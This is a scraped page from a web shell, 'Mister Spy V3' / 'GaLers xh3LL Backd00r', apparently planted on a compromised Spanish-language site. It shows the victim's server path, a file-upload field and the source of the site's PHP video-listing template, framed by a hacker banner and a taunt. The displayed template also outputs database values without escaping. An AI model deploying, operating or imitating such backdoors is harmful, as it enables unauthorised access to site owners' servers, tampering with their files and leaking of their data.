Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/
Upload File :
Current File : /home/caballoscriollos/www/web/ssi_videos.php

<!--Portfolio Page Start-->
<section class="portfolio-page">
    <div class="container">
        <div class="section-title-three text-center">
            <h2 class="section-title-three__title" style="text-transform: none;">Videos y Podcast</h2>
        </div>
        <div class="row">
            <?php
            if ($arrData) {
                foreach ($arrData as $oVideo) {
            ?>
            <div class="col-xl-4 col-lg-6 col-md-6  ">
                <div class="news-three__single">
                    <div class="news-three__img-box">
                        <div class="news-three__img video-container">
                            <img src="https://img.youtube.com/vi/<?= GetIdVideoYouTube($oVideo->Url) ?>/sddefault.jpg" alt="">
                            <div class="video-img-icon">
                                <a href="https://www.youtube.com/watch?v=<?= GetIdVideoYouTube($oVideo->Url) ?>" class="video-popup">
                                    <div class="main-slider-four__video-icon">
                                        <i class="fa fa-play"></i>
                                        <i class="ripple"></i>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                    <div class="news-three__content">
                        <h3 class="news-three__title mt-2">
                            <a href="https://www.youtube.com/watch?v=<?= GetIdVideoYouTube($oVideo->Url) ?>" class="video-popup"><?= $oVideo->Nombre ?></a>
                        </h3>
                    </div>
                </div>
            </div>
            <?php
                }
            } else {
            ?>
            <div class="col-md-12 filter-item morfologia-">
                <p>
                    No hay registros disponibles
                </p>
            </div>
            <?php
            }
            ?>
        </div>
        <div class="portfolio-page__pagination">
            <ul class="pg-pagination list-unstyled">
                <?= $Paginado ?>
            </ul>
        </div>
    </div>
</section>
<!--Portfolio Page End-->

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat